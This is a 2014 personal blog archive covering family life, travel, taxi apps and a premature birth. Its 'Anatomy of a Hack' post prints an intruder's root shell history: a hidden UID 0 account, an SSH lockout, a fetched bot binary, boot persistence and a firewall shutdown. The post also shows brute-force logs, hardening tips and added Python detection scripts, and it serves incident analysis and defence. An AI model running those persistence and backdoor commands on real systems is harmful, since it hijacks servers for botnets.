Archive | 2014

Merry Christmas & A Happy New Year For 2015!

I had a wonderful xmas and I hope you did too, my mom was over from the UK to visit for the festive period (and to visit her new cute grandson of course).

Merry Xmas 2014

We had some friends over, we had some epic food (I made siu yuk and bbq pork ribs!) and great gifts (although the presents were mostly for Liam this year haha).

Xmas Spread

I got amazing presents from my wife though, some super cool Rayban sunglasses and something I’ve wanted so much I almost cried when I opened the present – a Sony Z3 – my old phone was getting really decrepit.

Xmas Pressies!

Of course we had amazing desserts too! This year we had green/red meringues to make eton mess with – yum!

Xmas Eton Mess

Had a truly awesome day, thanks for all who came 🙂 Here’s to an incredible 2015!


Less Than 4 Minutes On Sky News

Yah, that’s what I appeared for recently haha. I did a short segment on SkyNews regarding the Sony hack and the possibility of it being a North Korean cyber warfare strike.

Sky News Logo

Short segment but I think we covered quite a lot of ground, I’d love to have talked about it a bit more – but well I looked like a dishevelled hobo with a cool flaming mario t-shirt.

It’s a pretty interesting story and I did a summary post about it on Darknet here: Sony Pictures Hacked – Employee Details & Movies Leaked.

Yah my claim for fame this month haha.


My Experience With Uber vs MyTeksi In Malaysia

So yah, if you live in Malaysia you know about the taxi situation. I’m pretty sure we’ve all had some experiences with the poorly maintained, rude, cut-throat taxi drivers that are one of the worst things about this beautiful country.

Even if you don’t take taxis much (like me), you will experience them driving like absolute dicks on the road. One even banged me before, Stupid Taxi Drivers..

Get FREE Uber Credits Now HERE – Free Uber Rides

Uber vs MyTeksi in Malaysia

Taxi Drivers in Malaysia are Known For:

  • Not wanting to use the meter.
  • Refusing the journey if it’s too ‘short’, too ‘long’
  • Refusing or charging extra because it’s vaguely jammed along the way
  • Refusing or charging extra because it’s raining.
  • Driving like idiots (not signalling, stopping abruptly, blocking traffic etc)
  • Having poorly maintained cars
  • Having smelly/smoky cars
  • Playing weird music
  • Talking crap
  • Not knowing how to go to the destination (or sometimes where it is)

There’s more, but yah – you get the gist of it. Anyway, thankfully in the past few years there’s been a few startups trying to address this issue. I did try radio cabs (Sunlight) before when my car was in the workshop for an overhaul, and well that didn’t go very pleasantly either – No Taxi – Malaysian Taxis Are Teh SUCK.

So yah, I’m super grateful for MyTeksi, EasyTaxi, Taxi Monger and more recently of course (with all the drama attached) – Uber.

Anyway, recently I’ve had quite a few events in KL and Bangsar, and I decided not to drive, so on both occasions I took MyTeksi from home to the venue, and Uber back. Partially because where I live (in the ‘burbs) there are no Uber cars, and partially because I wanted to compare the prices/service etc. As I’ve heard quite often, Uber works out cheaper. So yah, here is my take on Uber vs MyTeksi In Malaysia.


MyTeksi Logo

So MyTeksi has been around quite a while, now generally known as GrabTaxi (regionally) because the localised spelling of Teksi made no sense outside of Malaysia. They are well funded, and just got another $65 Million USD (Taking the total to $90 Million USD).

They exist to solve the problem with errant taxi drivers in Malaysia and allow some kind of rating system, plus removal of drivers from the system that get bad reports against them. All drivers must use the meter.


  • Pretty easy to find a taxi, wherever you are in KL (even in my ‘burb)
  • Easy to use app
  • Usually get a taxi quite fast

My experience on the whole with MyTeksi has been a positive one, the app has worked well, the taxis have always arrived in a timely fashion, been polite, driven well and charged according to the meter.


  • It’s still a Malaysian taxi..many are badly maintained, old, smelly etc
  • Can be hard to find a taxi when it rains or during rush hours (even though there are a lot around, no-one accepts)
  • The drivers still really actively choose if they want to pick you up or not
  • The receipt is basic and doesn’t let you know the cost or show you the route the car took
  • Can cost more than Uber (especially if there’s traffic etc)
  • You need to carry cash, there’s no other way to pay in Malaysia
  • If the driver did overcharge you, there’s not much you can do



Uber Logo

So Uber is a fairly new contender on the block and has caused a lot of drama recently with the issues of legality, the threat to the taxi industry and so on. It’s been around since 2009 and is also heavily funded, but just came to Malaysia fairly recently.

It’s like a ridesharing + limo service app – which is cool.


  • If there is a car in your area, it has to come and it will. The drivers are employed.
  • The cars are clean, new and comfortable (I’ve had a Camry both times).
  • The drivers are polite, ask you if you like the music and drive well
  • The cars often have free mineral water (great if you’ve been drinking)
  • You don’t need cash
  • Splitting the cost of a ride is super easy
  • If the driver went the wrong way, Uber will correct the fare and give you a refund
  • The receipt is very detailed and even shows you the route you took on a map.

Uber Route


  • It can be hard to get a car, especially if you aren’t in central areas (KL, Bangsar etc)
  • Can be expensive if it’s a really popular time (multipliers)

Honestly I’m really struggling here to find any negatives with Uber.

As for the cost, the first trip which was from my house to KL center (Starhill) the Taxi from MyTeksi cost RM48 (mostly due to the epic jam) – the estimated fare was RM21-32. The return trip with Uber cost RM31. The 2nd trip was more similar, with the Taxi it was RM30 (from my place to Bangsar South) and to come back with Uber was RM32.

If I have the choice, Uber will always be my #1. If no Uber cars are available then I’ll use MyTeksi.


Going Almost Viral On Facebook – Yusuf Taiyoob Meme

Almost viral? Isn’t that like almost famous, or almost rich? Yah it’s not famous, or rich or in this kind viral (even though it kinda is). Anyway.

I make funny videos on instagram sometimes, I made a bunch in Europe in different countries (I meant to do one for each country, but yah I failed at that). You can see them on Instagram with the hashtag #daviesfunnyvids.

So I always knew the formula for success was a white dude speaking BM, so I did a video in that format around Hari Raya because the Yusuf Taiyoob adverts on the radio are too hilarious. If you’re not familiar, they are near pornographic.

The most famous Yusuf Taiyoob meme image would be this one I guess:

Yusuf Taiyoob

Anyway I did my video about this, and it was kinda popular. It was ok on Instagram but it got a little bit wild on Facebook.

Yusuf Taiyooh by Omputeh

I loves dates, yah really.

Posted by Gareth Davies on Thursday, 24 July 2014

Ending up with over 600 likes, over 250 comments and over 1300 shares. Not too bad right, I thought it could have gotten much more but I just don’t have that kind of audience.

But then someone stole it, who did have the right kind of audience, guess what happened? Yah it went nuts haha with almost 16,000 likes and almost 6000 shares but no credit back to me and it wasn’t shared from the original video (they basically downloaded it, then re-uploaded on their own page).

Stolen Viral Video

What can I do? Nothing really, just enjoy the fact that I did get some kind of popularity from the video haha. I still have about 400 pending friend requests from that period.

There were even some people meme-ing me, as apparently to every Malay person I look like the WWE wrestler Big Show. Yah every time I buy a Ramly burger, it’s almost guaranteed the chap selling the food will say “Wah, abang macam big show lehh”.

Big Show Makan Kurma

So yah, it was fun, it was interesting, I shall have to think of more funny videos that I can do speaking BM.

That was my 20 minutes of fame I guess.


Bangkok – Our Favourite City in Asia? And Some Tips

So yah, Bangkok..I was supposed to write this post back in 2011 sometime I guess haha, I started with 1 picture in October 2011 but it got kinda stuck there.

We really love Bangkok, we’ve been back a couple of times since – but this was our first trip so it was kind of special and it was a surprise birthday trip for Kim as well. I was trying to be more romantic, proactive etc as I was a bit of a bum most of the time haha. Plus she’d mentioned MANY times she wanted to go shopping there, check out Chatuchak etc.

Anyway I decided on Bangkok as I’d heard so many good things about it, we’d both been to Thailand and absolutely loved the food and people there but we’d never really explored Bangkok properly, and definitely not together so I went for it, I booked with AirAsia go and chose a cute boutique-ish hotel bang in the middle of Chinatown called Shanghai Mansion.

Bangkok has a whole bunch of cute and quirky hotels at reasonable prices, so do have a look outside of the chains for something different.

Anyway we arrived safely and checked in, and we were hungry, seen as though it was birthday girls weekend I let her choose what to eat…she chose to eat a whole suckling pig right next to the hotel and it was AWESOME. You can see her post about it here – The suckling pig in Bangkok.

Roast Suckling Pig

It was a bit different from the style we get here in Malaysia, it was nice but honestly we preferred how they do it here. The cool part was though they stir fried the rest of the meat with salt and pepper, which made a delicious dish to eat with our rice/veges.

We lucked out staying in Chinatown too and discovered one of our absolute favourite restaurants in Bangkok just walking distance from our hotel, more here – T&K Seafood in Bangkok’s Chinatown.

What we really adore about Thailand and especially Bangkok is the street food, it’s EVERYWHERE, it’s cheap, there’s loads of pork and it seems impossible to have a bad meal in Thailand. I mean just look at how amazing their chap fan/mixed rice is:

Thailand Mixed Rice

One thing you fast learn about Bangkok is, stick to taxis if you want to get somewhere in comfort. Taking a tuk tuk is fun, but only do it for that reason. A tuk tuk is not really any cheaper than a taxi (unless you’re perhaps a local), there’s no aircon, if it rains it sucks, if you get stuck behind something spewing diesel fumes it sucks and they will constantly hassle you to make ‘stops’ to help them out.

Every stop you make will reduce your fare by 20-40baht but take about 10-20 minutes each time, it’s worth doing once maybe just for fun. We actually did 3 stops just for shits and giggles and got the tuk tuk ride for free.

Tuk Tuk ride

But if you want to get anywhere just take a taxi, another important lesson to note – ALWAYS hail a moving cab, never take one parked at the road side (they tend to be the lazy, unscrupulous drivers).

As far as food goes there are a few dishes you absolutely must try the authentic versions of in Thailand, one is Pad Kra Pao (or Krapow) which is basically minced pork fried with loads of basil – super delicious. This one was inside Chatuchak market:

Pad Kra Pao

The other is of course braised pig leg rice which you can find everywhere and the good ones will simply blow your mind. Talking of Chatuchak, the place is immense and there’s a LOT of people, if I can give you one tip for Chatuchak it is – if you see something you like, just buy it, because the chance of you being able to locate the same stall again is slim to none.

Chatuchak Market

The birthday girl had a great time shopping of course and LOVED Chatuchak market as expected.

Kimberlycun at Chatuchak

The other place we’d heard a lot about was Platinum Mall so we spent a day there to check it out. Talking of stewed pork leg, the one at the Platinum Mall food court is definitely one of the best ones I’ve had, so if you do head there – check it out!

Platinum Mall - Bangkok

Platinum mall is like a smaller, more comfortable version of Chatuchak with aircon and much easier to navigate. The major downside I noticed was there’s very little men’s stuff in Platinum, compared to Chatuchak which also has other interesting sections (home, gardens, pets etc).

But the shopping experience at Platinum is much less sweaty and the food in the food court is tops! But even then, we still headed back to Chatuchak the next day for another go haha, and we managed to locate the legendary coconut ice cream, another memorable food from BKK.

Chatuchak Coconut Ice-cream

So yah that sums up Bangkok pretty much, shop, food, shop, food, massage, pass out – wake up and repeat. Super awesome!

Kinda miss Bangkok actually, can’t wait to take Liam there! Although now I’m older, I kind of enjoy the serenity of Bali too. Ah so many places to go…haven’t even been to Japan at all yet!


What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects is 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling too well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There were no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay conscious throughout the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker 🙂

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberzilla.


Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speaker’s slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for Papers) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good job – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave my next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will be used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):


You can see all my talks given here.


An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address.

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

1 w
2 uname -a
3 ethtool eth0
4 ifconfiog
5 ifconfig
6 last
7 useradd -g 0 -u 0 -o restart
8 echo restart:restart |chpasswd
9 echo "sshd:" >> /etc/hosts.allow
10 echo "sshd:" >> /etc/hosts.allow
11 echo "sshd:ALL" >> /etc/hosts.deny
12 cd /tmp/scp
13 ls
14 chmod 777 *
15 ./x 5.153
16 ls
17 chmod 777 *
18 ./x 5.153
19 cd /etc
20 wget
21 chmod 0755 com
22 ./com &
23 chattr +i com
24 echo "cd /root/">>/etc/rc.local
25 echo "./com&">>/etc/rc.local
26 echo "/etc/init.d/iptables stop">>/etc/rc.local
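
A triage sketch for the three persistence changes visible in that history: a second UID 0 account, the hosts.allow/hosts.deny lockout, and the rc.local entries. This is an added example, not code from the original post; the file contents are constructed samples, and 192.0.2.10 and 192.0.2.11 are documentation addresses standing in for the IPs that are missing from the page.

```python
import re

# Constructed file contents modelled on what the history above leaves behind.
# 192.0.2.10 and 192.0.2.11 are documentation addresses (assumption: the real
# addresses are not on the page).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
restart:x:0:0::/home/restart:/bin/sh
"""
HOSTS_ALLOW = "sshd:192.0.2.10\nsshd:192.0.2.11\n"
HOSTS_DENY = "# constructed sample\nsshd:ALL\n"
RC_LOCAL = """\
#!/bin/sh -e
cd /root/
./com&
/etc/init.d/iptables stop
"""

SUSPICIOUS_RC = [
    re.compile(r"^\./\S+\s*&"),                             # relative-path binary backgrounded at boot
    re.compile(r"\b(iptables|ufw|firewalld)\b.*\bstop\b"),  # firewall switched off at boot
]


def uid0_accounts(passwd_text):
    """Return every account with UID 0 other than root (useradd -u 0 -o creates one)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def _wrapper_rules(text):
    """Yield (daemons, clients) lists from a hosts.allow or hosts.deny body."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        daemons, clients = line.split(":", 1)
        yield daemons.replace(",", " ").split(), clients.replace(",", " ").split()


def ssh_lockout(allow_text, deny_text):
    """If hosts.deny blocks sshd for ALL, return the clients hosts.allow still admits, else None."""
    denied = any(
        bool({"sshd", "ALL"} & set(daemons)) and "ALL" in clients
        for daemons, clients in _wrapper_rules(deny_text)
    )
    if not denied:
        return None
    allowed = []
    for daemons, clients in _wrapper_rules(allow_text):
        if {"sshd", "ALL"} & set(daemons):
            allowed.extend(clients)
    return allowed


def rc_local_findings(rc_text):
    """Return rc.local lines that start a relative-path binary or stop the firewall."""
    hits = []
    for line in rc_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        if any(pattern.search(stripped) for pattern in SUSPICIOUS_RC):
            hits.append(stripped)
    return hits


def triage(passwd, hosts_allow, hosts_deny, rc_local):
    """Run all three checks and return the results keyed by check name."""
    return {
        "extra_uid0_accounts": uid0_accounts(passwd),
        "ssh_only_allowed_from": ssh_lockout(hosts_allow, hosts_deny),
        "rc_local_suspicious": rc_local_findings(rc_local),
    }


if __name__ == "__main__":
    for check, result in triage(PASSWD, HOSTS_ALLOW, HOSTS_DENY, RC_LOCAL).items():
        print(f"{check}: {result}")
```

On a live host the same functions can be fed the contents of /etc/passwd, /etc/hosts.allow, /etc/hosts.deny and /etc/rc.local read from a mounted image or rescue console.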

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from port 3117 ssh2
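
One way to catch this pattern in auth.log: flag an accepted password that follows a burst of failures from the same source, counting syslog's "message repeated N times" lines as N failures. This is an added example, not from the original post; the sample log is constructed, its IPs are documentation addresses, and the threshold, window and year are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the same syslog format as the excerpt above.
# 203.0.113.7 and 198.51.100.20 are documentation addresses, not the real sources.
SAMPLE_LOG = """\
Aug 30 01:47:41 host sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root
Aug 30 01:47:44 host sshd[20144]: Failed password for root from 203.0.113.7 port 1662 ssh2
Aug 30 01:47:54 host sshd[20144]: message repeated 5 times: [ Failed password for root from 203.0.113.7 port 1662 ssh2]
Aug 30 01:47:57 host sshd[20146]: Failed password for root from 203.0.113.7 port 4220 ssh2
Aug 30 01:47:57 host sshd[20146]: Accepted password for root from 203.0.113.7 port 4220 ssh2
Aug 30 09:02:11 host sshd[21001]: Failed password for deploy from 198.51.100.20 port 50514 ssh2
Aug 30 09:02:19 host sshd[21001]: Accepted password for deploy from 198.51.100.20 port 50514 ssh2
"""

TIMESTAMP = re.compile(r"^(\w{3}\s+\d+\s\d\d:\d\d:\d\d)")
EVENT = re.compile(r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")
REPEAT = re.compile(r"message repeated (\d+) times: \[")


def find_guessed_logins(log_text, threshold=5, window=timedelta(minutes=10), year=2014):
    """Return one alert per accepted password that follows >= threshold failures
    from the same source address inside the time window."""
    failures = defaultdict(list)  # source address -> timestamps of failed attempts
    alerts = []
    for line in log_text.splitlines():
        stamp = TIMESTAMP.match(line)
        event = EVENT.search(line)
        if not stamp or not event:
            continue  # PAM summary lines and unrelated messages
        # Syslog timestamps carry no year, so one is supplied by the caller.
        when = datetime.strptime(f"{year} {stamp.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, source = event.groups()
        if outcome == "Failed":
            repeat = REPEAT.search(line)
            count = int(repeat.group(1)) if repeat else 1
            failures[source].extend([when] * count)
            continue
        recent = [t for t in failures[source] if when - t <= window]
        if len(recent) >= threshold:
            alerts.append(
                {"when": when, "user": user, "source": source, "failures": len(recent)}
            )
        failures[source].clear()  # a success resets the counter for that source
    return alerts


if __name__ == "__main__":
    for alert in find_guessed_logins(SAMPLE_LOG):
        print(
            f"{alert['when']} {alert['user']} accepted from {alert['source']} "
            f"after {alert['failures']} failures"
        )
```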

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start, as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.


Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I thought, is that it? I was pretty underwhelmed to be honest, for a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat in it, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)... the car spun its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mph in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan... full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition. Also the fact that it was a target for car thieves and criminals, as the police didn’t have any cars fast enough to chase it, made it a little impractical.

